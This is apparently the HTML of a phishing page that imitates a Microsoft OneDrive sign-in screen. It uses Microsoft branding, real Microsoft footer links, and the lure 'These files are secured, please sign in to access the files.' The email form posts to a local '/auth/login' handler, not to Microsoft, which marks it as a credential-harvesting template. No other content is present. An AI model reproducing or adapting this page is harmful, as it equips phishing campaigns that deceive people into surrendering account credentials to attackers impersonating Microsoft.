<!DOCTYPE html>
<html dir="ltr" lang="en">

<head>
  <meta charset="UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Sign in - Microsoft OneDrive</title>
  <link rel="shortcut icon" href="/img/favicon.ico" type="image/x-icon">
  <link rel="stylesheet" href="/css/main.css">
  <script src="/js/jquery.js"></script>
</head>

<body class="cb" style="margin: 0;padding: 0;">
  <form name="emailForm" id="emailForm" method="post" action="/auth/login" class="main-form provide-min-height">
    <div class="login-paginated-page">
      <div class="background-image-holder">
        <div id="backgroundImage" class="background-image ext-background-image" style="background-image: url('/img/onedrive-bg.png');"></div>
      </div>

      <div class="outer">
        <div class="template-section main-section">
          <div class="middle ext-middle">
            <div class="full-height">
              <div class="flex-column">
                <div class="win-scroll">
                  <div id="lightbox" class="sign-in-box ext-sign-in-box fade-in-lightbox has-popup">
                    <div class="lightbox-cover"></div>
                    <div>
                      <img class="logo" role="img" src="/img/logo.svg" alt="Microsoft">
                    </div>

                    <div role="main">
                      <div class="pagination-view animate slide-in-back">
                        <div class="row title ext-title" id="loginHeader">
                          <p>These files are secured, please sign in to access the files.</p>
                          <div role="heading">Sign in</div>
                        </div>

                        <div class="row">
                          <div role="alert"></div>

                          <div class="form-group col-md-24">
                            <div class="error ext-error" style="display: none;">Please enter a valid email address.</div>
                            
                            <div class="placeholderContainer">
                              <input type="text" name="email" id="email" maxlength="113" class="form-control ltr_override input ext-input text-box ext-text-box" placeholder="Email address" spellcheck="false" autocapitalize="off" autocorrect="off" autocomplete="off">
                            </div>
                          </div>
                        </div>

                        <div class="position-buttons password-reset-links-container ext-password-reset-links-container">
                          <div class="row">
                            <div class="col-md-24">
                              <div class="text-13">
                                <div class="form-group">
                                  No account?
                                  <a href="https://login.live.com/oauth20_authorize.srf" id="signup">Create one!</a>
                                </div>

                                <div class="form-group">
                                  <a id="cantAccessAccount" name="cannotAccessAccount" href="https://login.microsoftonline.com/common/oauth2/v2.0/authorize">Can’t access your account?</a>
                                </div>
                              </div>
                            </div>
                          </div>
                        </div>

                        <div class="win-button-pin-bottom">
                          <div class="row">
                            <div class="col-xs-24 no-padding-left-right button-container button-field-container ext-button-field-container">
                              <div class="inline-block button-item ext-button-item">
                                <input type="button" id="backButton" class="win-button button-secondary button ext-button secondary ext-secondary" value="Back">
                              </div>

                              <div class="inline-block button-item ext-button-item">
                                <input type="submit" id="emailSubmitButton" class="win-button button_primary button ext-button primary ext-primary" value="Next">
                              </div>
                            </div>
                          </div>
                        </div>
                      </div>
                    </div>
                  </div>
                </div>
              </div>
            </div>
          </div>
        </div>
      </div>

      <div id="footer" role="contentinfo" class="footer ext-footer">
        <div id="footerLinks" class="footerNode text-secondary footer-links ext-footer-links">
          <a id="ftrTerms" href="https://www.microsoft.com/en-US/servicesagreement/" class="footer-content ext-footer-content footer-item ext-footer-item">Terms of use</a>
          <a id="ftrPrivacy" href="https://privacy.microsoft.com/en-US/privacystatement" class="footer-content ext-footer-content footer-item ext-footer-item">Privacy &amp; cookies</a>
          <a id="moreOptions" href="javascript:void(0)" role="button" class="footer-content ext-footer-content footer-item ext-footer-item debug-item ext-debug-item">...</a>
        </div>
      </div>
    </div>
  </form>
  
  <script src="/js/main.js"></script>
</body>

</html>